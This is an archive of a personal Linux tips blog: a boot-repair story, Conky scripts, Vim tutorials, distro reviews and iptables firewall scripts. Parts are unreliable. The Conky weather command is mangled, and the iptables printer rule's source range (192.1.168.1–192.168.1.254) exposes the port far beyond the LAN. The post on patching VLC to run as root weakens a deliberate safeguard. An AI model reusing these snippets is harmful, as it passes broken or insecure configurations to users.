LINUX tips tweaks & security issues!

Fixing 'initramfs error' boot Problem in Linux.

2012-01-08T18:38:00.000+05:30

Yesterday, I faced initramfs boot error on my Linux Mint 9 box. I don't know what went wrong, but I remember that I forced restart my system, as it was not responding. It hung up in a command line terminal. I changed the terminal (ctrl+alt+[f1-f6]), and then unable to get back to the GUI (ctrl+alt+f7). The screen was showing some weird software error.

Code:

No init found. Try passing init= boot arg
BusyBox v1.10.2 (Ubuntu 1:1.10.2.2ubuntu7) built-in shell (ash)
(initramfs)

As I was unable to proceed any further, I pressed the power switch. After booting it, I was caught in the initramfs problem. I shook my head; what the heck is this, seen it first time. Trying some commands was of no use. So, then I tried to boot it by pen-drive and fix the issue. I did some search about the error, got something really useful.
I booted by my pen-drive, but I cannot have root access in Linux Mint live cd. Again, I made a bootable pen-drive using Gparted, but again I was stopped by an error. I tried 2-3 more times with different stuffs.
The problem was, I was not getting a terminal with root access. So, at last I used my final weapon, BackTrack live cd. It's the most sought hacking/cracking live cd. I installed it on my pen-drive, and BOOM I got the root login. Now, nothing more was needed.
Executed,
#fdisk -l /dev/sda
This gave me the listing of all partitions, ext2/ext3/ext4 drives for Linux. Now, look for the drive creating problem.
ext3/ext4 are marked by id 83. Now, did this,
#fsck -yv /dev/sda7
You have to see it by yourself, that the problem is in which partition, mine was in sda7. fsck command just checks the filesystem for errors. In my case, the problem was the partition was locked due to accidental shutdown, and the boot loader was not able to access my init ram file which is needed during bootup.
After executing the command, I saw some errors getting fixed and filesystem repaired. At the end, I rebooted and my Linux Mint was again back to life.

Conky Script to display Weather Forcast on your desktop.

2011-12-03T09:30:00.001+05:30

First get the basics of the post from here. Here is a simple script to display weather forecast on your desktop. I'm using yahoo weather to get the xml feed of forecast because it requires no login/registration and can be just use it directly.

Conky Configuration File

# UBUNTU-CONKY
# A comprehensive conky script, configured for use on
# Ubuntu / Debian Gnome, without the need for any external scripts.
#
# Based on conky-jc and the default .conkyrc.
background yes
# Create own window instead of using desktop (required in nautilus)
own_window yes
own_window_type desktop
own_window_transparent yes
own_window_hints undecorated,below,skip_taskbar

# Use double buffering (reduces flicker, may not work for everyone)
double_buffer yes

# fiddle with window
use_spacer yes
use_xft no

# Update interval in seconds
update_interval 3.0

# Minimum size of text area
# minimum_size 80 5

# Draw shades?
draw_shades no

# Text stuff
draw_outline no # amplifies text if yes
draw_borders no
font ms sans
uppercase no # set to yes if you want all text to be in uppercase

# Stippled borders?
stippled_borders 3

# border margins
border_margin 0

# border width
border_width 0

# Default colors and also border colors, grey90 == #e5e5e5
default_color cyan
default_shade_color black
#default_outline_color CCCCCC

own_window_colour white
own_window_transparent yes

# Text alignment, other possible values are commented
#alignment top_left
#alignment top_right
#alignment top_middle
alignment bottom_left
#alignment bottom_right

# Gap between borders of screen and text
gap_x 0
gap_y 0

# stuff after 'TEXT' will be formatted on screen

TEXT
Weather Report [Bangalore]
${color white}${execi 40 curl --silent "http://xml.weather.yahoo.com/forecastrss?w=2295420&u=c" | grep -E '(C//' -e 's///' -e 's/<\/b>//' -e 's/
//'}

You have to customize this script for your city, just you have replace 'Bangalore' with your city and the code w=[your city code that you can find in yahoo weather], that's all.

Conky : Ultimate System Monitoring Tool

2011-10-13T09:16:00.001+05:30

Conky is the lightweight, super-configurable application, which sits on your desktop or terminal. It is a fork of Torsmo and licensed under the GPL 3.0.
It can also be customized to gather and display almost any type of information on the user's desktop or terminal.
Conky can be extended & customized with the Lua programming language, and uses its own configuration file syntax. Its biggest strength lies in its ability to be extended through scripting.
It is ported to devices such as the Nokia N900, and can be ported to practically any system with GCC and an X11 implementation.
User created customized scripts, demonstrating Conky's modularity and versatility in function and appearance can be found here.
Features

Displays statistics for CPU, disk, memory, top processes, network, and more anywhere on your desktop.

Supports many popular Linux music player.

Text-based configuration allows for a high level of customization.
Built in IMAP and POP3 support

Built in support for many popular music players (MPD, XMMS2, BMPx, Audacious).

Can be extended using built in Lua support, or any of your own scripts and programs.

Built in Imlib2 and Cairo bindings for arbitrary drawing with Lua.

Installation

Debian/Ubuntu
$ sudo apt-get install conky

Gentoo
Conky is in portage. You can install it with:
# emerge app-admin/conkyor

Using Paludis:
# paludis -i app-admin/conkyArch

Conky is available in pacman:
# pacman -S conky

References:
http://en.wikipedia.org/wiki/Conky_%28software%29
http://conky.sourceforge.net/

VIM Cheatsheet!

2011-09-21T00:39:00.001+05:30

Vim users must use this cheatsheet. It's very informative & gives complete information about vim.

DoudouLinux : Linux for kids.

2011-06-20T21:36:00.001+05:30

DoudouLinux is a Linux distro meant for kids . It provides tons of applications that suit children from 2 to 12 years old with an environment as easy to use as a gaming console. The project's version 1.0, code name "Gondwana", is now released.
Standard DoudouLinux is delivered with about fifty applications that have been specially chosen to be accessible for children from 2 years old. These applications cover the following topics:
Education - teach children while having fun.
Fun - have fun with games, easy to access but not necessarily simplistic
Work - write texts, calculate, communicate, etc.
Multimedia - listen to music, watch videos, play or create music, or create animation movies

DoudouLinux is available in several languages so that each child will feel comfortable when he begins reading. It currently support the following 15 languages: Arabic, Chinese, Dutch, English, French, Greek, Italian, Persian, Polish, Romanian, Russian, Spanish, Serbian, Swedish and Ukrainian.

To make it run, a PC or Macintosh computer is required with 256 MB memory and 800 MHz processor inside.
Recommended configuration
The minimal recommended configuration to run DoudouLinux is:
256 MB memory
800 MHz processor
800×600 dots display

To determine which version to download, you need to choose:
the support type to be used (CDROM or USB key)
the CDROM or USB key language.

Reference:
http://www.doudoulinux.org/spip/english/about/article/why-should-i-try-doudoulinux

Run vlc media player as root.

2011-06-19T14:20:00.000+05:30

There's an issue in vlc player that it won't run when you are logged in as root. I don't know the reasons, may be its developers have some security concerns.
Anyways, you can make it run as root by following a simple series of steps, assuming that you have already installed it & it's running in case of other users.
Follow these steps:

Login as root.
Install ghex/khex (Hex editor for Gnome/KDE environment).

$apt-get install ghex
OR

$apt-get install ghex2
It might be possible that your OS repository don't support ghex version. In that case type apt-get install ghex & hit . In my case it was ghex2.
It will take some time.

After installing, open the vlc binary file /usr/bin/vlc in hex editor.

$ghex2 /usr/bin/vlc

Now, search for the string 'geteuid' inside the binary file.

Edit > Find > Type 'geteuid' in right text box & hit 'find next' button. This step might be different for different versions.

Once you find the string replace 'geteuid' with 'getppid'. Append the string with caution, an wanted change can crash vlc. Just try to replace 2 characters eu with pp, by just pointing the cursor in insert mode to e & replace it with p, again replace u with p.
Now, you can run vlc as root.

Understanding VIM : [Tabs] Tutorial-5

2011-06-11T07:58:00.000+05:30

It's quite possible that you may be working on several projects at once, having tabs set up can be a cool way to multi-task without having to see all of your files at once.
If you want to start Vim with more than one file, run vim -p filename1 filename2. This will open each file in its own tab.
Already in a Vim session? You can open a new tab with :tabnew filename to open (or create) a file.
To switch to the next (right) tab use gt in command mode. To switch to the previous (left) tab, use gT.
To close a tab you can use :q. If you're editing one file in a tab and use :wq Or you can use :tabc to save & close it.

    * vim -p filename1 filename2 to open multiple files in tabs from the command line.
    * :tabnew to open a new tab.
    * gt to switch to the next tab.
    * gT to switch to the previous tab.
    * :tabc to close a tab.

You can also combine tabs and viewports -- so you can have a session with multiple viewports in each tab, if you like. Mix and match, Vim is very flexible and if you can think of something that Vim would logically need to do, odds are that it does.

There is, of course, always more. Use Vim's :help function to read more about the various tab commands and functions.

Mastering these techniques will definitely increase your productive with Vim. In the next installments more advanced techniques will be covered. In the meantime, you might also want to check out the vimtutor command (terminal command). It will walk you through some of the more common functions in Vim.

blueproximity : Lock/unlock Desktop using Bluetooth.

2011-06-07T21:02:00.001+05:30

This software helps you add a little more security to your desktop by detecting one of your bluetooth devices, most likely your mobile phone and locks the desktop if the mobile is not in the vicinity. If you move away from your computer and the distance is above a certain level for a given time, it automatically locks your desktop or starts any other shell command that you want.
Once away your computer awaits till you are back with your mobile. If you are nearer than a given level for a set time your computer unlocks magically without any interaction (or starts any other shell command you want).

Command to install:
sudo aptitude install blueproximity

Next you have to configure the Blueproximity options. In lock tab you can add your custom commands.
The upper section refers to the commands that will be executed for the according event. The preset is the command to lock/unlock the screen using the GNOME desktop screensaver. For KDE user you should activate the combobox and select the xscreensaver-command entry. Please note that this will only work with the KDE integrated version of xscreensaver. The original xscreensaver does not include an unlock command.
The proximity command is a command that is executed every given time while the user is in reach & the screen is unlocked. That way you can e.g. prevent your screensaver from becoming active while you are near.
The lower section refers to logging of locking/unlocking events. The syslog entry allows you to generate a syslog message on every state change coming from the given logfacility and the loglevel notice. You may also additionally or exclusively log to a certain file.
But you can turn your monitor off at the time of lock which will save Electricity when you are away from your computer and switch it on when you return. Using Following Commands to lock&turn off and “unlock & turn On the monitor
Locking Command: gnome-screensaver-command -l && xset dpms force off
Unlocking command: xset dpms force on && gnome-screensaver-command -d
And with this you have finished the basic setup of blueproximity.

Read more here:
http://blueproximity.sourceforge.net/manual.html

Understanding VIM : [Viewpoints] Tutorial-4

2011-06-05T13:53:00.001+05:30

Using viewpoints & tabs (introduced in vim 7), we can edit more than one file at a time. This is useful when you are connected with a remote machine & you prefer to open only one session. It's also useful when we want to edit a long file at different lines.
Viewpoints breaks the vim editor into two or more segments, either vertically or horizontally. Open a vi editor & then go to last line command, enter :split. You can now see two views of the same file.

In case, you want to open another file in a new viewpoint, you can do it by :sp [filename], if you don't provide any filename, then the editor will open the same file in another viewpoint, so now you have 3 viewpoints. You may want a new empty viewpoint for doing some rough work & then adding it in original file, try :new. At this stage if you want to go back to 2 viewpoints just do :q & you are back. Now, try editing different parts of the same file, press Ctrl-w to switch in between different viewpoint, you can run Ctrl-w k to move to the upper viewport, and Ctrl-w j to move down.
If, instead of moving between viewports, you want to move the viewports, you can use Ctrl-w r and Ctrl-w R to rotate windows clockwise and counter-clockwise, respectively.
If you want to return to a single view, you can close the view by quitting the file normally (:q) or by running Ctrl-w c in the viewport you want to close. You'll be prompted to save the file first.
Quick review.

:split or Ctrl-w s will split the Vim view into two viewports, horizontally.
:vsplit or Ctrl-w v will split the Vim view into two viewports, vertically.
:split filename will split the Vim view into two viewports, horizontally, and open filename in the new viewport.
:vsplit filename will split the Vim view into two viewports, vertically, and open filename in the new viewport.
:new open new empty viewpoint.
:sp[lit] [filename] open new viewpoint in new file.
:qall! quit all viewpoints.
Ctrl-w to rotate between views.
Ctrl-w k to move to upper view.
Ctrl-w j to move down.
Ctrl-w r moves viewports clockwise.
Ctrl-w R moves viewports counter-clockwise.

Extremely Lightweight Linux : AntiX

2011-05-03T22:55:00.001+05:30

AntiX is a fast, lightweight and easy to install linux live CD distribution which provides suitable information for old computers. It is based on Debian Testing and MEPIS for Intel-AMD x86 compatible systems. It should run on most computers, ranging from 64MB old PII 266 systems with pre-configured 128MB swap to the latest powerful boxes. 128MB RAM is recommended minimum for antiX. The installer needs minimum 2.2GB hard disk size. antiX can also be used as a fast-booting rescue cd. 128 MB RAM is the recommended minimum for antiX while the installer needs a minimum of 1.2 GB hard disk space. antiX can also be used as a fast-booting rescue CD.

Many cli apps are also included such as Alpine for email, moc for audio, elinks for browsing, abcde and ripit for cd ripping and much more. Features include a cli-installer script for fast and light install, live with persistence, 'remaster on the fly', new boot cheatcodes for setting dpi and desktop windows manager with or without icons, antix2usb to easily install to usb stick.Many languages are fully supported out of the box with the language chosen at live CD boot carrying over to install. Chinese, Japanese and Korean fonts are included as well as ibus in the full version.

Full Release notes for 'Jayaben Desai' (antiX-M11)
Main upgrades from 'Marek Edelman' (antiX-M8.5)

New antiX tools to configure system, user management, wallpaper and PC information.
MEPIS 2.6.36-4 kernel
Improved antiX-Control Centre, new options.
New icewm/fluxbox menu structure
Improved and extended themes and artwork for icewm and fluxbox
Localisation of antiX apps extended
Chinese, Japanese and Korean fonts included in antiX-full, as well as ibus.
meta-installer to install kde4, xfce, lxde, gnome and lite versions. LibreOffice available too.
wallpaper is now set by feh and nitrogen is removed.
Thunar replaces pcmanfm
xfburn replaces gnomebaker
no /etc/X11/xorg.conf file is created by default, option to create one by removing the noxorg cheat at boot.
umt-panel2 (from aptosid) added for GPRS/UMTS/3G
vim added by request
isolinux used instead of grub in live mode
hybridiso
adblock added to improve internet surfing with low RAM.
X.org 7.5
Rox-filer 2.10
fluxbox 1.3.1
wicd 1.7 with wicd-ncurses added
pidgin 2.7.11
ceni 2.21

Toorox Review

2011-04-26T21:37:00.001+05:30

Toorox is a Linux Live-DVD based on Gentoo which uses KNOPPIX technology in booting. While booting, all necessary drivers will be included automatically (lshwd). It comes with lots of useful applications including system configuration tools, easy package management, and proprietary code installers. It compiles and install software from Gentoo sources. Toorox installation on your computer begin as a binary installation with all its advantages, such as fast, easy, and ready at boot, but subsequent package installation compiles source packages.

Toorox lists some of their software in an introduction that appears when the desktop starts. These include:
- Kernel 2.6.37-gentoo
- KDE 4.6.0
- Xorg-Server 1.9.4
- LibreOffice 3.3.1
- IceCat 3.6.13
- Thunderbird 3.1.7
- K3b 2.0.2
- Gimp 2.6.11
- Wine 1.3.14
- VLC 1.1.7
- Amarok 2.4.0
- Audacious 2.4.3
- Ardour 2.8.7
- Kino 1.3.3
- Cinelerra 20101104

Toorox includes two graphical Portage front-ends: Potato and Porthole.
Minimum equipment:
i686 CPU (Pentium II and faster) + 512MB RAM + DVD
Optimum equipment:
Multi-Core CPU + 1GB RAM + DVD

Toorox linux can be used for the following jobs:
- Backup data
- Secure internet browsing
- Look and feel for Linux rookies
- Hard disk installation
- Making a Live USB-Pendrive

References:
http://toorox.de/index.php

MoonOS - A feel of Mac OS X in Linux

2011-04-20T16:59:00.014+05:30

MoonOS is a lightweight Linux distribution which uses the Enlightenment window manager and is based on Ubuntu/Debian, having a touch of the Mac's OS X.
According to MoonOS' official website, the focus of Moon is speed, low memory use, and attractive looks:
MoonOS' download is sizable, weighing in at 832MB, but the system requirements are very basic:

700 MHz x86 processor
384 MB of system memory (RAM)
8 GB of disk space
Graphics card capable of 1024x768 resolution
A network or Internet connection is neededif you want to download extra software

The dock of MoonOS is quite similar to the OS X version, it still possesses all the customization that Linux users have come to expect. This includes:

positioning the dock on the top, sides, and bottom;
controlling the size of the icons' magnification when they are moused over;
the color and appearance of the dock, such as 2-D or 3-D;
and even creating more than one Docky.

There are 2 well known versions of MoonOS:

moonOS E17 Edition & moonOS LXDE Edition
moonOS E17 Edition use Enlightenment DR17 as its default window manager. moonOS LXDE Edition use LXDE as its default window manager. Its fast and lightweight, good for older/smaller computers. moonOS LXDE Edition replaces GRUB with, moonOS toolset and more
Applications included are:
    * OpenOffice.org, the default office program
    * Mozilla Firefox, the default web browser
    * Exaile, the default music player
    * Transmission, the default BitTorrent application
    * GIMP, the default graphics editor
    * Totem Movie Player, the default video player
    * Brasero, the default optical disc burning software
    * Pidgin, the default instant messaging client
It is believed that moonOS is a fork of Linux Mint because it has a similar user interface as Mint, and Moon's IRC client opens the Mint help channel when launched.

References:

http://moonos.org

Understanding VIM : Beginner's Tutorial-3

2011-04-10T12:11:00.004+05:30

In the previous tut., we have learned copying/pasting/searching within the file. Now, we are going to take a step further in the direction of Vim editor mastery.
While editing a file, we may need to number the lines with in the file, most probably in case of a program, may be a C program. We can achieve this by this command. (Note that we are in last line mode.)

:set number

or its abbreviation:

:set nu

Lines now appear numbered, upon writing the file, the numbers will not be written in the file. It's only for your viewing. Line numbers are displayed either until you quit the vi session until you disable the set
option:

:set nonumber

:set nonu

To temporarily display the line numbers for a set of lines, you can use the # sign. For example:

:1,10#

Longer words that have been used previously, can be searched using, Ctrl-p or Ctrl-n. Let's say you're typing the word searching, which you've already used once in a document. Type "ear" and then hit Ctrl-p, and Vim will either autocomplete the word if "ear" is a unique string, or show a list of words that begin with "ear". The Ctrl-p command searches for "previously" used terms and displays them in that order, and Ctrl-n searches for the "next" terms, and displays in that order. For most uses, they're pretty equivalent.
We can set abbreviation in Vi editor using ab.

:ab hkm hakkunnamatata

:ab iot Institute of Technology

So the first argument is the abbreviation, the second argument to the :ab command is the expansion. Now, when you type the characters hkm (in insert mode) you'll get hakkunnamatata. What happens if you want to unset an abbreviation? You could exit Vim, and the abbreviation will go away when the session ends.
But it sounds like fool's way of doing things. There is another sound way.

:una hkm

To disable all abbreviation -

:unab abbr

To list your currently defined abbreviations, type:

:ab

Install & create QR code.

2011-04-01T18:21:00.000+05:30

QR code stands for Quick Response code which is a 2D bar code, readable by dedicated QR barcode readers and camera phones. The code consists of black modules arranged in a square pattern on a white background.
The information encoded can be text, URL or other data. Read more here.

QR codes can be created in Linux using Qrencode.

Installing steps for Ubuntu:

#sudo apt-get install qrencode

You can use dpkg to know more about qrencode after installing it

#dpkg -s qrencode

Installing steps for RedHat/Fedora Linux:

#yum install qrencode

Check details of the package.

#yum info qrencode

You can also download qrencode from here

After installing, create QR codes through Terminal,

#qrencode -o [file.png] '[text/url/information to encode]'

Qrencode for this blog.

#qrencode -o linux-techy.png 'http://www.linux-techy.blogspot.com'

If you want to increase the size of QR code generated, use the ‘-s‘ argument where the value of ‘-s‘ will generate ‘sxs’ 2D image.

#qrencode -o ~/Desktop/google.png -s 8 'http://google.com'

This will create 8x8 image.

References -

http://en.wikipedia.org/wiki/QR_code

http://www.linuxaria.com/pills/qr-code-in-linux?lang=en

Scientific Linux 6.0 - A treat to scientific community.

2011-03-20T16:46:00.000+05:30

Scientific Linux (SL) 6.0 produced by Fermi National Accelerator Laboratory and the European Organization for Nuclear Research (CERN). It is the latest release of a Red Hat-based distribution specifically developed to meet the needs of the scientific computing community. This release is based on Red Hat Enterprise Linux (RHEL) 6.0 like CentOS, compiled from source.
SL 6.0 includes a number of tools, including Eclipse 3.5.2, Gnu Emacs, OpenJDK, and both Qt3 and Qt4. Python 2.6.5 is the default version installed along with gcc 4.4.4. You can install other languages using the normal Add/Remove Software tool from the System / Administration menu. Certain choices added that were not present in the predecessor 5.0 are

Standard Gnome desktop
Minimal Desktop (this will give you a light Gnome with little more than Firefox, Nautilus file manager and the Terminal)
Basic Server (511 packages, a cli server setup)
Database Server (525 packages, cli setup)
Web Server (612 packages, cli setup)
Virtual Host (554 packages, cli only by default)
Software Development Workstation (Emacs, Eclipse, OpenJDK, VMM)
Web Development Workstation (Emacs, Eclipse, OpenJDK)
Minimal (206 packages only, cli only)

it also provides additional packages not found in the upstream product, the most notable among these are various file systems, including Cluster Suite and Global File System (GFS), FUSE, OpenAFS, Squashfs and Unionfs, wireless networking support with Intel wireless firmware, MadWiFi and NDISwrapper, Sun Java and Java Development Kit (JDK), the lightweight IceWM window manager, R - a language and environment for statistical computing, and the Alpine email client.
The new version is fast and smooth on 512MB.

REMnux : Distro for Malware Analyst

2011-01-14T17:55:00.000+05:30

REMnux is another pentesting OS that you would like to have in your arsenal. Basically, it aids investigating malwares, so it's a very handy OS for malware analysts for reverse engineering malicious piece of software. The distribution is based on Ubuntu. Along with analysing malwares, it can also assist analyzing IRC bots, network monitoring, javascript deobfuscation, analyzing shellcode, memory forensics etc.

REMnux is also useful for analyzing web-based malware, like malicious JavaScript, Java programs and Flash files. It also has tools for analyzing malicious documents, such as Microsoft doc files, PDF files, and utilities for reversing malware through memory forensics. In these cases, malware may be loaded onto REMnux and analyzed directly without requiring other systems to be present in the lab.
There is a huge list of tools in this OS [excerpt from http://zeltser.com/remnux/ ] :

Malware Analysis Tools Set Up On REMnux
Analyzing Flash malware: swftools, flasm, flare, RABCDAsm
Analyzing IRC bots: IRC server (Inspire IRCd) and clients (Irssi, ircII). To launch the IRC server, type "ircd start"; to shut it down "ircd stop". To launch the IRC client, type "irc".
Network-monitoring and interactions: Wireshark, Honeyd, INetSim, fakedns and fakesmtp scripts, NetCat
JavaScript deobfuscation: Firefox with Firebug, NoScript and JavaScript Deobfuscator extensions, Rhino debugger, two versions of patched SpiderMonkey, Windows Script Decoder, Jsunpack-n
Interacting with web malware: TinyHTTPd, Paros proxy, Burp Suite Free Edition, stunnel, VirusTotal VTzilla, User Agent Switcher, Tor and torsocks with "usewithtor"). To launch the Tor daemon, type "tor start"; to shut it down "tor stop".
Analyzing shellcode: gdb, objdump, Radare (hex editor+disassembler), shellcode2exe, libemu with "sctest", diStorm disassembler library
Dealing with suspicious files: upx, packerid, bytehist, xorsearch, TRiD, xortools.py, ClamAV, ssdeep, md5deep, pescanner.py
Malicious document file analysis: Didier's PDF tools, Origami framework, Jsunpack-n, pdftk, pyOLEScanner.py
Memory forensics: Volatility Framework with malware.py, AESKeyFinder and RSAKeyFinder.
Miscellaneous: unzip, strings, feh image viewer, SciTE text editor, OpenSSH server, VBinDiff file comparison/viewer.

It doesn't cover all malware analysis tools, specially those designed for windows. Those who like to work in windows tools should look at ZeroWine project.
You can download VMware version or Live cd version of this distribution.
References:
http://zeltser.com/remnux/
http://holisticinfosec.org/toolsmith/docs/september2010.html

Understanding VIM : Beginner's Tutorial-2

2011-01-04T17:31:00.000+05:30

Cont. from previous post.
Here we are going to know about copying/pasting & searching in vim editor. Let's open a file, created previously.
Now, we want to search 'gofer'. If you are not inside command mode, type [esc]. Now, type /gofer & enter. If you want to highlight next appearance of gofer, hit n. If you want to highlight previous appearance of gofer, hit N.

Use these syntax for further editing:
    * /text search for text in the document, going forward.
    * n move the cursor to the next instance of the text from the last search. This will wrap to the beginning of the document.
    * N move the cursor to the previous instance of the text from the last search.
    * ?text search for text in the document, going backwards.
    * :%s/text/replacement text/g search through the entire document for text and replace it with replacement text.
    * :%s/text/replacement text/gc search through the entire document and confirm before replacing text.

If you accidentally deleted the lines using dd key, you can paste it back using p & P keys. Use v/V to move cursor using arrow keys, then use y to copy some text & paste it using p/P.
    * v highlight one character at a time.
    * V highlight one line at a time.
    * Ctrl-v highlight by columns.
    * p paste text after the current line.
    * P paste text on the current line.
    * y yank text into the copy buffer.

Now, type : to get into last-line mode. hit w to write or if you want to write it in different file, do w & enter. You can also save the file using ZZ which will save & quit the file.

Understanding VIM : Beginner's Tutorial-1

2010-12-31T00:04:00.002+05:30

Vim editor takes some time to settle within the working arena of professionals. It's a cake walk when people use it for atleast a week.
There are three modes in vim - insert mode, command mode, and last-line mode.
Insert mode is meant for inserting text, press i for start mode. Command mode is used for executing formating texts. Last-line mode is used for executing extended commands for text formating.
Start Vim by typing vim /vi .

When you run vim filename to edit a file, Vim starts out in command mode. This means that all the alphanumeric keys are bound to commands, rather than inserting those characters. Typing j won't insert the character "j"--it will move the cursor down one line. Typing dd will delete an entire line, rather than inserting "dd." To get into insert mode, press i.
Now you can insert text. You finished writing the text, so you want to save it. Type esc key, now you are in command mode. You may need to edit your file using these keys:
    * h moves the cursor one character to the left.
    * j moves the cursor down one line.
    * b move backward one word.
    * G move to the end of the file.
    * gg move to the beginning of the file.
    * `. move to the last edit.
    * k moves the cursor up one line.
    * l moves the cursor one character to the right.
    * 0 moves the cursor to the beginning of the line.
    * $ moves the cursor to the end of the line.
    * w move forward one word.
    * x for deleting the character at which cursor is present.
    * d starts the delete operation.
    * dw will delete a word.
    * d0 will delete to the beginning of a line.
    * d$ will delete to the end of a line.
    * dgg will delete to the beginning of the file.
    * dG will delete to the end of the file.
    * u will undo the last operation.
    * Ctrl-r will redo the last undo.
Note that all these deletion operation will start from the position of cursor.
You can extend the operation of these keys, for example k will move the cursor 1 line up, similarly 3k will move the cursor 3 lines up. Same follows for l, w, b, h, j, b.
Ok, now you want to search something within the text file or save it. Type :, to get into last-line mode. Now save & exit by entering wq!. w for write, q for quit & ! to confirm your operation. If you want to exit without saving any changes, press q!. We will be covering keys for searching & copying/pasting in the next post. Stay tuned.

Enhance Linuxbox Security : Iptables Printer Rules to Limit Access to Local LAN.

2010-12-30T22:36:00.000+05:30

Assume a topology of a local LAN connected to the internet through a gateway in which you are configuring Iptables firewall. This gateway is attached to a printer & running a print server. The LAN belongs to 192.168.1.0/24 ip range. We want to limit the access of printer within the local LAN & bar the printer access from the outside internet. See figure.

We have to edit the iptables configuration file mentioned in this post to accomodate rules meant for print server.

#!/bin/bash
# please verify if the Source Address Verifcation in /etc/sysctl.conf is enabled: 
#net.ipv4.conf.all.rp_flter = 1
# Define some variables
# Location of the binaries
IPTABLES="/sbin/iptables"
# Loopback Interface
LOOPBACK="lo" 
## Flush all rules
$IPTABLES -F

## Set default policies
$IPTABLES -P INPUT DROP
$IPTABLES -P OUTPUT ACCEPT
$IPTABLES -P FORWARD DROP
# Creating a custom chain SERV. 
$IPTABLES -N SERV

## Allow access to the Loopback host, so that you can ping yourself
$IPTABLES -A INPUT -i $LOOPBACK -j ACCEPT
$IPTABLES -A OUTPUT -o $LOOPBACK -j ACCEPT

## Incoming external traffic rules 
# Accept ICMP echo-replay incoming traffic for outgoing PINGs, so that when you 
# ping other pc your pc don't drop the echo-reply & you can detect alive coms.   
$IPTABLES -A INPUT  -p icmp --icmp-type echo-reply -j ACCEPT
#calling custom chain
$IPTABLES -A INPUT -j SERV

## Accept all established incoming traffic
$IPTABLES -A INPUT  -p tcp -m state --state RELATED,ESTABLISHED -j ACCEPT
## Log all dropped incoming traffic
$IPTABLES -A INPUT -j LOG -log-prefix="myLogInput:"


##Rules in custom chain that will be executed when called.  
#Accepting communication at specific ports. Use command netstat --inet -pln . 
# If firefox is running on #8008
$IPTABLES -A SERV -p tcp --dport  8008 -j ACCEPT
#For allowing ssh to whole world, can create security problem
# always allow to a particular ip. 
$IPTABLES -A SERV -p tcp --dport  22 -j ACCEPT
#Limiting the printer Access to local LAN
$IPTABLES -A SERV -m iprange --src-range 192.1.168.1-192.168.1.254 -p tcp --dport 631 -j ACCEPT
$IPTABLES -A SERV -m iprange --src-range 192.1.168.1-192.168.1.254 -p udp --dport 631 -j ACCEPT

Port 631 is standard port for CUPS print server. The rules appended will allow incoming packets meant for CUPS print server from all systems within the LAN, debarring the access to print server from outside.

Enhance Linuxbox Security : Creating a Custom Chain in Iptables

2010-12-30T20:50:00.000+05:30

Read this post before proceeding as it contains simple basic firewall configuration file.
We can customize the flow of rules in iptables by creating new custom chains. The flow of rules in iptables follows the sequence of their execution.

To create a custom chain issue this command:

iptables -N SERV

Now, you have to create rules for this chain. Creating new chain just acts like a function in C programs. To call the new chain you have to execute this command.

iptables -A INPUT -j SERV

Now, you have to append the original firewall.sh iptables configuration file, posted in this post.

#!/bin/bash
# please verify if the Source Address Verifcation in /etc/sysctl.conf is enabled: 
#net.ipv4.conf.all.rp_flter = 1
# Define some variables
# Location of the binaries
IPTABLES="/sbin/iptables"
# Loopback Interface
LOOPBACK="lo" 
## Flush all rules
$IPTABLES -F

## Set default policies
$IPTABLES -P INPUT DROP
$IPTABLES -P OUTPUT ACCEPT
$IPTABLES -P FORWARD DROP
# Creating a custom chain SERV. 
$IPTABLES -N SERV

## Allow access to the Loopback host, so that you can ping yourself
$IPTABLES -A INPUT -i $LOOPBACK -j ACCEPT
$IPTABLES -A OUTPUT -o $LOOPBACK -j ACCEPT

## Incoming external traffic rules 
# Accept ICMP echo-replay incoming traffic for outgoing PINGs, so that when you 
# ping other pc your pc don't drop the echo-reply & you can detect alive coms.   
$IPTABLES -A INPUT  -p icmp --icmp-type echo-reply -j ACCEPT
#calling custom chain
$IPTABLES -A INPUT -j SERV

## Accept all established incoming traffic
$IPTABLES -A INPUT  -p tcp -m state --state RELATED,ESTABLISHED -j ACCEPT
## Log all dropped incoming traffic
$IPTABLES -A INPUT -j LOG -log-prefix="myLogInput:"


##Rules in custom chain that will be executed when called.  
#Accepting communication at specific ports. Use command netstat --inet -pln . 
# If firefox is running on #8008
$IPTABLES -A SERV -p tcp --dport  8008 -j ACCEPT
#For allowing ssh to whole world, can create security problem
# always allow to a particular ip. 
$IPTABLES -A SERV -p tcp --dport  22 -j ACCEPT

Linux Amazing Keypresses & Commands : Set 5

2010-12-29T14:20:00.000+05:30

By default in Bash shell pressing Ctrl+D will exit the current shell . To prevent it you can add the following line in ~/.bashrc:

export IGNOREEOF=1

And then source the file to read it again:

source ~/.bashrc

sed is a non-interactive command line stream editor, used to perform various forms of text transformations on an input stream. It reads input files line by line and applies the operation specified via the command line.

For replacing the first occurrence of a string (india) with another string (India) in a file.

#sed -i ‘s/india/India/’ file_name

For replacing the first occurrence of a string (india) with another string (India) in a file.

#sed -i ‘s/india/India/g’ file_name

s stands for substitute, g stands for global.
For creating a new file with the above changes.

#sed -e ‘s/india/India/g’ file1 > file2

Closing a vulnerable port on your system, you have to install nmap first to check which ports are open:

#nmap localhost

This will output open ports and the protocol using them. To close port 80 on tcp (for http) , execute the commad as root:

#fuser -k 80/tcp

To count no. of lines, words & characters in a file, use this command

#wc -lwc file_name

It is a handy command when we need to customize output.

Fuduntu = [Fedora + Ubuntu]

2010-12-28T23:25:00.004+05:30

Fuduntu is a perfect distro for those users who hate RedHat due to its complexities & less user friendliness. It is a distro developed to bridge the gap between Fedora & Ubuntu. It is a Fedora remix optimized for Netbook and other portable computers & may be regarded as the most attractive cousin of RedHat. Fedora mainly focuses on developers perspective whereas Ubuntu focuses on end user experience. Distros like Mint, Ubuntu are well versed with user needs & append it’s apps, but Fedora lacks such schemes. These are the pitfalls which are mainly taken care of in Fuduntu. Although, it’s in an incipient stage now, it has a good collection of default packages. It also needs to focus more on user needs.

Features
• Intended to be reasonably sized, yet have a sane software set by default
• Intended to be tweaked for performance out of the box
• Intended to be tuned for battery life out of the box
• Fuduntu specific updates hosted in the signed Fuduntu repo
• Leverages Fedora updates and release cycle for upstream patches
• Point release ISOs updated often for convenience to new Fuduntu users

Some of the tweaks found in Fuduntu:

• BFS task scheduler
• Deadline IO scheduler
• /tmp and /var/log moved to RAM disk
• Swappiness reduced to 10
• Jupiter for power savings
• Gnome default desktop tweaks
• Gnome Terminal color tweaks

A few of the default packages found in Fuduntu:

• Adobe Flash
• Fluendo MP3 Codec
• Infinality Freetype
• Nautilus Elementary
• OpenOffice
• Thunderbird
• GIMP
• Jupiter
• VIM Enhanced

Project Page -> http://sourceforge.net/projects/fuduntu/
